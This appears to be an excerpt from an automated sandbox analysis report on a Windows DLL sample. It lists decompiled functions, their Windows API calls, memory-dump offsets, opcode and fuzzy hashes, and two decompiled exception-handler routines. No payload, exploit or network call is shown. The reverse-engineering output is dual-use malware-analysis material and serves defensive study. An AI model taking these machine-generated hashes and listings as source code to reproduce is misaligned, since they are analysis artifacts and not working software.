                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E8D2486
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2850889275-0
                                                                                                                                  • Opcode ID: 5649d428ed47da11ec4ef0a01fbe7aad667313889e2e80295eb15f59273d7fed
                                                                                                                                  • Instruction ID: cacd5d3117400bba96c35f0eef031e4a15cc83a7ce22c54ea43f1eb3c5add07b
                                                                                                                                  • Opcode Fuzzy Hash: 5649d428ed47da11ec4ef0a01fbe7aad667313889e2e80295eb15f59273d7fed
                                                                                                                                  • Instruction Fuzzy Hash: 8661E730614516CFEB96CFEDDAA0A5933B6FB85314B248D69DC26C71C4F738D88AC680
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93E3AD, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(6E93E4D3,00000001,00000000,?,-00000050,?,6E93EB01,00000000,?,?,?,00000055,?), ref: 6E93E41F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                  • Opcode ID: 8ce4dc85f7f05d7cbb5081f043e070444c4953912fdb3be74504236485fbce07
                                                                                                                                  • Instruction ID: ec4df1d747b66a7f4f7eb34ee97d0d554dccf7db8d58512a4246da976acf555f
                                                                                                                                  • Opcode Fuzzy Hash: 8ce4dc85f7f05d7cbb5081f043e070444c4953912fdb3be74504236485fbce07
                                                                                                                                  • Instruction Fuzzy Hash: 31112C376187059FDB189FB5C4945AAB7A5FF84328B24443DE94647700E371F902CB40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93E448, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(6E93E726,00000001,00000000,?,-00000050,?,6E93EAC5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6E93E492
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                  • Opcode ID: 5e89e090f99e95e2a37099d80e09374f080dfe6f4518d0c165553431e5f5111e
                                                                                                                                  • Instruction ID: 5d7f11fcc7e1f6e7a592e8ae722fd64cc4789abfe046f12bde312d80ec3096c8
                                                                                                                                  • Opcode Fuzzy Hash: 5e89e090f99e95e2a37099d80e09374f080dfe6f4518d0c165553431e5f5111e
                                                                                                                                  • Instruction Fuzzy Hash: 70F0F6362043145FDB245FF9D898AAABBA9EFC5378F25882DE9454B740D7B1EC01CB10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E930429, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E91843F: RtlEnterCriticalSection.NTDLL(?), ref: 6E91844E
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(6E93041C,00000001,6E978410,0000000C,6E930CBD,00000000), ref: 6E930461
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                  • Opcode ID: b97751cffa8c9626ad83faed5d905fcf054dfcab8ca539a9b2afe4c787c3ddc9
                                                                                                                                  • Instruction ID: 4e5737b4a39d99a815b47dfb66b9ae05dac4464cb8e04b32bd058bd254b887ea
                                                                                                                                  • Opcode Fuzzy Hash: b97751cffa8c9626ad83faed5d905fcf054dfcab8ca539a9b2afe4c787c3ddc9
                                                                                                                                  • Instruction Fuzzy Hash: C6F037B2A08614DFDB14DF98D406B9C77F1FF86329F10852AE5109B390DBB589018F40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93E344, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(6E93E29D,00000001,00000000,?,?,6E93EB23,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E93E37B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                  • Opcode ID: be9e7473e4eb8c2592ee2234f2023605977b441d307d89f77ff6dfba030e52d7
                                                                                                                                  • Instruction ID: 304dda0d599526ac28a166a09a3cfc9f01031f352d703dfcf669ddc4a6fe1c6c
                                                                                                                                  • Opcode Fuzzy Hash: be9e7473e4eb8c2592ee2234f2023605977b441d307d89f77ff6dfba030e52d7
                                                                                                                                  • Instruction Fuzzy Hash: E0F0AB3A304305D7CB049FF5C85866ABFA9EFC2324B2A405DEE158B244C231DC43CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E930E4C, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6E9333BC,?,20001004,00000000,00000002,?,?,6E93271D), ref: 6E930E80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: 1ecdc2edb4b198198d789f55fb1110279f6729f7531c43fafa7d9b63e6f61740
                                                                                                                                  • Instruction ID: 2980b46676be542dd658a049e93d512565831d633e2b5f34dc73c376acc47147
                                                                                                                                  • Opcode Fuzzy Hash: 1ecdc2edb4b198198d789f55fb1110279f6729f7531c43fafa7d9b63e6f61740
                                                                                                                                  • Instruction Fuzzy Hash: 40E04F72504568FBCF222FA2DC08EDE3E29EF89B61F204411FD1565164EB71C921AED5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E909EB5, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000008,?,00000000,?,?,6E90981B,?,00000022,00000000,00000002,?,?,6E906C7B,00000000,?), ref: 6E909EE2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: 99417140444bfd3d37fead0a4a1394f5131cf679107cb5dd69828b384b25bca8
                                                                                                                                  • Instruction ID: 9ebb66daffc46d2a15d3cbf5da4e87f4b68d5fc56af74f645368489bc9a82615
                                                                                                                                  • Opcode Fuzzy Hash: 99417140444bfd3d37fead0a4a1394f5131cf679107cb5dd69828b384b25bca8
                                                                                                                                  • Instruction Fuzzy Hash: D7E08C32504A29EB8F026FD1E8088EE3F29EF8A6217048408FA0816114DB32DC219FD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92A2B1, Relevance: .7, Instructions: 668COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 5f40a0dd0c4a552ff0e23014a82536aaffd7119b4394a32d190597e9de75930b
                                                                                                                                  • Instruction ID: aa7e2cd4220c81234c574cd0fa39c625b7d77e5f5f82c627cd7ad6c8cfd830bd
                                                                                                                                  • Opcode Fuzzy Hash: 5f40a0dd0c4a552ff0e23014a82536aaffd7119b4394a32d190597e9de75930b
                                                                                                                                  • Instruction Fuzzy Hash: 2B328E7592020A9FCF14CF98C990AAEBBB9EF85304F244579DC85A7319D771EA46CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E91B597, Relevance: .2, Instructions: 159COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                                                  • Instruction ID: ac6231c390fffe17c144cd6997c9da17a612999ed568ab5644aa858a057b9866
                                                                                                                                  • Opcode Fuzzy Hash: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                                                  • Instruction Fuzzy Hash: 46515D71E04219EFDB04CF99C990AEEBBB6AF88354F188499E815AB305D734DA51CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AF24, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                  			E00A3AF24(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00A3B08F(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00A3B149(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00A3B034(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00A3B08F(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00A3B12B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                                                  0x00a3af28
                                                                                                                                  0x00a3af29
                                                                                                                                  0x00a3af2a
                                                                                                                                  0x00a3af2d
                                                                                                                                  0x00a3af2f
                                                                                                                                  0x00a3af32
                                                                                                                                  0x00a3af33
                                                                                                                                  0x00a3af35
                                                                                                                                  0x00a3af36
                                                                                                                                  0x00a3af37
                                                                                                                                  0x00a3af3a
                                                                                                                                  0x00a3af44
                                                                                                                                  0x00a3aff5
                                                                                                                                  0x00a3affc
                                                                                                                                  0x00a3b005
                                                                                                                                  0x00a3af4a
                                                                                                                                  0x00a3af4a
                                                                                                                                  0x00a3af50
                                                                                                                                  0x00a3af56
                                                                                                                                  0x00a3af59
                                                                                                                                  0x00a3af5c
                                                                                                                                  0x00a3af60
                                                                                                                                  0x00a3af65
                                                                                                                                  0x00a3af6a
                                                                                                                                  0x00a3afea
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3af6c
                                                                                                                                  0x00a3af6c
                                                                                                                                  0x00a3af78
                                                                                                                                  0x00a3af7a
                                                                                                                                  0x00a3afd5
                                                                                                                                  0x00a3afd5
                                                                                                                                  0x00a3afdb
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3af7c
                                                                                                                                  0x00a3af8b
                                                                                                                                  0x00a3af8d
                                                                                                                                  0x00a3af8e
                                                                                                                                  0x00a3af8f
                                                                                                                                  0x00a3af92
                                                                                                                                  0x00a3af92
                                                                                                                                  0x00a3af94
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3af96
                                                                                                                                  0x00a3af96
                                                                                                                                  0x00a3afe0
                                                                                                                                  0x00a3af98
                                                                                                                                  0x00a3af98
                                                                                                                                  0x00a3af9c
                                                                                                                                  0x00a3afa4
                                                                                                                                  0x00a3afa9
                                                                                                                                  0x00a3afae
                                                                                                                                  0x00a3afba
                                                                                                                                  0x00a3afc2
                                                                                                                                  0x00a3afc9
                                                                                                                                  0x00a3afcf
                                                                                                                                  0x00a3afd3
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3afd3
                                                                                                                                  0x00a3af96
                                                                                                                                  0x00a3af94
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3af7a
                                                                                                                                  0x00a3afee
                                                                                                                                  0x00a3afee
                                                                                                                                  0x00a3afee
                                                                                                                                  0x00a3af6a
                                                                                                                                  0x00a3b00a
                                                                                                                                  0x00a3b011

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                  • Instruction ID: 3ea574d4d32250adebb477b08403fdc0cb90e01c9f4c547181bd51669351b59c
                                                                                                                                  • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                  • Instruction Fuzzy Hash: 8021B3729002149FCB14EF68C8C59ABBBA5FF45360F058169F95ACB245EB30FA15CBE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D21B4, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                  			E6E8D21B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E8D231B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E8D23D5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E8D22C0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E8D231B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E8D23B7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                                                  0x6e8d21b8
                                                                                                                                  0x6e8d21b9
                                                                                                                                  0x6e8d21ba
                                                                                                                                  0x6e8d21bd
                                                                                                                                  0x6e8d21bf
                                                                                                                                  0x6e8d21c2
                                                                                                                                  0x6e8d21c3
                                                                                                                                  0x6e8d21c5
                                                                                                                                  0x6e8d21c6
                                                                                                                                  0x6e8d21c7
                                                                                                                                  0x6e8d21ca
                                                                                                                                  0x6e8d21d4
                                                                                                                                  0x6e8d2285
                                                                                                                                  0x6e8d228c
                                                                                                                                  0x6e8d2295
                                                                                                                                  0x6e8d21da
                                                                                                                                  0x6e8d21da
                                                                                                                                  0x6e8d21e0
                                                                                                                                  0x6e8d21e6
                                                                                                                                  0x6e8d21e9
                                                                                                                                  0x6e8d21ec
                                                                                                                                  0x6e8d21f0
                                                                                                                                  0x6e8d21f5
                                                                                                                                  0x6e8d21fa
                                                                                                                                  0x6e8d227a
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d21fc
                                                                                                                                  0x6e8d21fc
                                                                                                                                  0x6e8d2208
                                                                                                                                  0x6e8d220a
                                                                                                                                  0x6e8d2265
                                                                                                                                  0x6e8d2265
                                                                                                                                  0x6e8d226b
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d220c
                                                                                                                                  0x6e8d221b
                                                                                                                                  0x6e8d221d
                                                                                                                                  0x6e8d221e
                                                                                                                                  0x6e8d221f
                                                                                                                                  0x6e8d2222
                                                                                                                                  0x6e8d2222
                                                                                                                                  0x6e8d2224
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2226
                                                                                                                                  0x6e8d2226
                                                                                                                                  0x6e8d2270
                                                                                                                                  0x6e8d2228
                                                                                                                                  0x6e8d2228
                                                                                                                                  0x6e8d222c
                                                                                                                                  0x6e8d2234
                                                                                                                                  0x6e8d2239
                                                                                                                                  0x6e8d223e
                                                                                                                                  0x6e8d224a
                                                                                                                                  0x6e8d2252
                                                                                                                                  0x6e8d2259
                                                                                                                                  0x6e8d225f
                                                                                                                                  0x6e8d2263
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2263
                                                                                                                                  0x6e8d2226
                                                                                                                                  0x6e8d2224
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d220a
                                                                                                                                  0x6e8d227e
                                                                                                                                  0x6e8d227e
                                                                                                                                  0x6e8d227e
                                                                                                                                  0x6e8d21fa
                                                                                                                                  0x6e8d229a
                                                                                                                                  0x6e8d22a1

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                  • Instruction ID: 3dba9b9fdb84efc16dfcfc6f9f73db927b97784e3e41c9c038a64ccd36ea66d3
                                                                                                                                  • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                  • Instruction Fuzzy Hash: ED21C8339042059FDB04DFA8D8C09A7F7A9FF49360B058968ED159B255DB34FA19CBE0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E90E8C0, Relevance: .1, Instructions: 76COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                  • Instruction ID: 28c011631795f296de75091bbe9a06583e8ee99802b4772b5435c53a33efb243
                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                  • Instruction Fuzzy Hash: 6D112B7724108387EEC485EEC4B46B6E39EEFC62257E943BED0718B658D123E1459E00
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E97DBB5, Relevance: .1, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682810308.000000006E97D000.00000040.00020000.sdmp, Offset: 6E97D000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                  • Instruction ID: 216e6ea19dba01eba8a33855f16e34442eb607f7b667f430c2d023ca35827b62
                                                                                                                                  • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                  • Instruction Fuzzy Hash: D711B1733401019FDB64CE99DC90EA6B7EAEF9A230B298466ED04CB315D676E805CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E97DEAA, Relevance: .1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682810308.000000006E97D000.00000040.00020000.sdmp, Offset: 6E97D000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                                  • Instruction ID: f55bcf6f0da8fc41d44446790822707d7f37b191135efcddaa6fd411a35095fd
                                                                                                                                  • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                                  • Instruction Fuzzy Hash: 5901D6323542418FDB69CF69D994D69B7E8EFD3764B15C07EC44683719D230E489CD20
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E938861, Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7fd1dc8cc4201bab0dfbcad80c1a42e0146a61ef2c67b76f7307b9c56e3daa6f
                                                                                                                                  • Instruction ID: 8919c0a9f3d783687ceb74e9836705c62af56a308a8715ae0cf6c1e3ea6d5a50
                                                                                                                                  • Opcode Fuzzy Hash: 7fd1dc8cc4201bab0dfbcad80c1a42e0146a61ef2c67b76f7307b9c56e3daa6f
                                                                                                                                  • Instruction Fuzzy Hash: A3E08C32911238EBCB28CBC8C9449CAB3ECEF84B54B254496B521D3580D270DE00CBD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E906CAF, Relevance: 48.3, APIs: 32, Instructions: 287COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E906CB6
                                                                                                                                  • collate.LIBCPMT ref: 6E906CBF
                                                                                                                                    • Part of subcall function 6E9059D8: __EH_prolog3_GS.LIBCMT ref: 6E9059DF
                                                                                                                                    • Part of subcall function 6E9059D8: __Getcoll.LIBCPMT ref: 6E905A43
                                                                                                                                    • Part of subcall function 6E9059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E905A5F
                                                                                                                                  • __Getcoll.LIBCPMT ref: 6E906D05
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D19
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D2E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D7F
